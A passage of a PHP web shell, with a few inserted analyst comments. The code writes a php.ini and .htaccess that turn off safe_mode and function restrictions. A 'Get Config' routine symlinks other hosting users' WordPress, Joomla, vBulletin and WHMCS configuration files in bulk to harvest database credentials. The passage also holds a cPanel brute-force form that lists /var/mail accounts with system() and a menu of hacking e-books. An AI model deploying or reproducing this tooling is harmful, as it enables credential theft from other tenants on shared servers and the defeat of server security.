2077</center>"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } if($_POST['matikan']=='sekatan'){ @error_reporting(0); $phpini = 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ=='; $file = fopen("php.ini","w+"); $write = fwrite ($file ,base64_decode($phpini)); fclose($file); $htaccess = 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ=='; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); echo "<hr><center><b>DONE!"; echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } if($_POST['mendapatkan']=='passwd'){ @set_magic_quotes_runtime(0); ob_start(); error_reporting(0); @set_time_limit(0); @ini_set('max_execution_time',0); @ini_set('output_buffering',0); $fn = $_POST['foldername']; function syml($usern,$pdomain) { symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); 
symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); 
symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); 
symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); 
symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); 
symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); 
symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); 
symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); 
symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt'); symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt'); symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt'); symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt'); symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt'); symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt'); symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt'); symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt'); symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt'); symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt'); symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt'); symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt'); symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt'); symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt'); 
symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt'); symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt'); symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt'); symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt'); symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt'); symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt'); symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt'); symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt'); symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt'); symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt'); symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt'); symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt'); symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt'); symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt'); } $d0mains = @file("/etc/named.conf"); if($d0mains) { mkdir($fn); chdir($fn); foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); syml($user['name'],$domains[1][0]); } } } echo "<center><font color=lime size=3>[ Done ]</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; } else { mkdir($fn); chdir($fn); $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '<br/>'; $temp = trim($temp); $file5 = 
fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
2078aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
2079biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
2080'; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); $file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); echo "</table>"; unlink("test.txt"); echo "<center><font color=lime size=3>[ Done ]</font></center>"; echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>"; } echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>"; exit; } ?>
2081<form method="POST" target="_blank">
2082 <strong>
2083<input name="page" type="hidden" value="find"><table>
2084 </strong><br><br><center><font size="5" style="italic" color="#FF0000">--==[ Cpanel BruteForce ]==--</font></center><br><br>
2085 <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
2086 <tr>
2087 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
2088 <center><b><font size="5" style="italic" color="#FF0000">Cpanel BruteForce</font></b></center></td></tr>
2089 <tr>
2090 <td>
2091 <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
2092 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
2093 <strong>User :</strong></td>
2094 <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php /* Analyst note: runs the shell command `ls /var/mail` and prints its output
   straight into the "usernames" textarea of the form headed "Cpanel BruteForce",
   so the field arrives pre-filled with whatever names exist in that directory
   (presumably local mailbox/account names - confirm on the host). A web-server
   process spawning `ls` is a useful detection signal. */ system('ls /var/mail');?></textarea></strong></td>
2095 </tr>
2096 <tr>
2097 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
2098 <strong>Pass :</strong></td>
2099 <td valign="top" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
2100 </tr>
2101 <tr>
2102 <td valign="top" bgcolor="#151515" class="style2" style="width: 139px">
2103 <strong>Type :</strong></td>
2104 <td valign="top" bgcolor="#151515" colspan="5">
2105 <span class="style2"><strong>Simple : </strong> </span>
2106 <strong>
2107 <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
2108 <font class="style2"><strong>/etc/passwd : </strong> </font>
2109 <strong>
2110 <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
2111 </strong>
2112 </span>
2113 </td>
2114 </tr>
2115 <tr>
2116 <td valign="top" bgcolor="#151515" style="width: 139px"></td>
2117 <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
2118 </strong>
2119 </td>
2120 <tr>
2121</form>
2122<tr>
2123 <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
2124 </tr>
2125<form method="POST" target="_blank">
2126 <strong>
2127<input name="mendapatkan" type="hidden" value="passwd">
2128 </strong>
2129 <tr>
2130 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Folder Name :</strong></td>
2131 <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
2132 </strong>
2133 </td>
2134 </tr>
2135 <tr>
2136 <td valign="top" bgcolor="#151515" style="width: 139px"></td>
2137 <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
2138 </strong>
2139 </td>
2140 <tr>
2141</form>
2142<tr>
2143 <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Get Wordlist</strong></td>
2144 </tr>
2145<form method="POST" target="_blank">
2146 <strong>
2147<input name="pass" type="hidden" value="password">
2148 </strong>
2149 <tr>
2150 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Url Config :</strong></td>
2151 <td valign="top" bgcolor="#151515"><strong><input class ='inputz' size="35" name="url" type="text"></strong></td>
2152 </strong>
2153 </td>
2154 </tr>
2155 <tr>
2156 <td valign="top" bgcolor="#151515" style="width: 139px"></td>
2157 <td valign="top" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
2158 </strong>
2159 </td>
2160 <tr>
2161</form>
2162<tr>
2163 <td valign="top" bgcolor="#151515" class="style1" colspan="6"><strong>Info
2164 Security</strong></td>
2165 </tr>
2166 <tr>
2167 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Safe Mode</strong></td>
2168 <td valign="top" bgcolor="#151515" colspan="5">
2169 <strong>
2170<?php /* Analyst note: "Safe Mode" row of the "Info Security" table. Prints ON only
   when ini_get('safe_mode') compares equal to '1', otherwise OFF. safe_mode was
   removed in PHP 5.4, so on later versions ini_get() returns false here and the
   row always reads OFF. */ $safe_mode = ini_get('safe_mode'); if($safe_mode=='1') { echo 'ON'; }else{ echo 'OFF'; } ?>
2171 </strong>
2172 </td>
2173 </tr>
2174 <tr>
2175 <td valign="top" bgcolor="#151515" style="width: 139px"><strong>Desible Function</strong></td>
2176 <td valign="top" bgcolor="#151515" colspan="5">
2177 <strong>
2178<form method="POST" target="_blank">
2179 <strong>
2180<input name="matikan" type="hidden" value="sekatan">
2181 </strong>
2182
2183<?php /* Analyst note: "Desible Function" row. Reads the disable_functions ini value
   (errors suppressed with @). Empty value: prints "No Security for Function".
   Non-empty: raises a JavaScript alert, prints the list unescaped, and renders
   a submit button for the surrounding form, whose hidden field is
   matikan=sekatan. The handler for that field, earlier in this file, writes a
   php.ini and a .htaccess into the script's working directory from base64
   literals; unexpected copies of those two files beside web content are worth
   alerting on. */ if(''==($func=@ini_get('disable_functions'))) { echo "<font color=#FF0000>No Security for Function</font></b>"; }else{ echo '<script>alert("Please see below and press >Please Click Here First!<");</script>'; echo "<font color=red>$func</font></b>"; echo '<tr><td valign="top" bgcolor="#151515" style="width: 139px"></td>'; echo '<td valign="top" bgcolor="#151515" colspan="5"><strong><input type="submit" value="Please Click Here First!">
2184 </strong>
2185 </td></tr>'; } ?></strong></td></tr></table></table></table>
2186<?php } elseif(isset($_GET['x']) && ($_GET['x'] == 'tutor')) { ?>
2187 <form action="?y=<?php echo $pwd; ?>&x=tutor" method="post">
2188 <center><br><br><b>--=[ Tutorial & Ebook hacking ]=--</b><br>
2189 <form method="post" action="">
2190<table class="tabnet" border="1" >
2191<tr>
2192 <td align="center">English</td><td align="center">Indonesian</td>
2193 </tr>
2194 <tr>
2195 <td><form method="post" action="">
2196 E-book Hacking :
2197 <select class="inputzbut" name="pilih" id="pilih">
2198 <option value=""selected>-----------------[ Select ]-----------------</option>
2199 <option value="tutorial24" > Hacking Exposed-5 </option>
2200 <option value="tutorial25"> Internet Denial Of Service </option>
2201 <option value="tutorial26">Computer Viruses For Dummies</option>
2202 <option value="tutorial27">Hack Attacks Testing</option>
2203 <option value="tutorial28">Secrets Of A Super Hacker</option>
2204 <option value="tutorial29">Stealing The Network</option>
2205 <option value="tutorial30">Hacker's HandBook</option>
2206 </select>
2207 <input type="submit" name="submit" class="inputzbut" value="Download">
2208 </td></form>
2209<td><form method="post" action="">
2210Tutorial :
2211 <select class="inputzbut" name="pilih" id="pilih">
2212 <option value=""selected>-----------------[ Select ]-----------------</option>
2213 <option value="tutorial2">Search Engine Hacking</option>
2214 <option value="tutorial3">SQL Injection dengan hackbar</option>
2215 <option value="tutorial1" >Bypass Union</option>
2216 </select>
2217 <input type="submit" name="submit" class="inputzbut" value="Download">
2218</form></td>
2219</tr>
2220<tr>
2221<td>
2222<form method="post" action="">
2223E-Book from Syn|gress :
2224 <select class="inputzbut" name="pilih" id="pilih">
2225 <option value=""selected>-----------------[ Select ]-----------------</option>
2226 <option value="cryptography_for_defeloper">Cryptography for Developer</option>
2227 <option value="tutorial31">Mobile Malware Attack and Defense</option>
2228 <option value="forensic">CD and DVD Forensic</option>
2229 <option value="ddd">Open Sourch Security Tools</option>
2230 <option value="metasploit">Metaslpoit Toolkit</option>
2231 <option value="stealing_network">Stealing the Network</option>
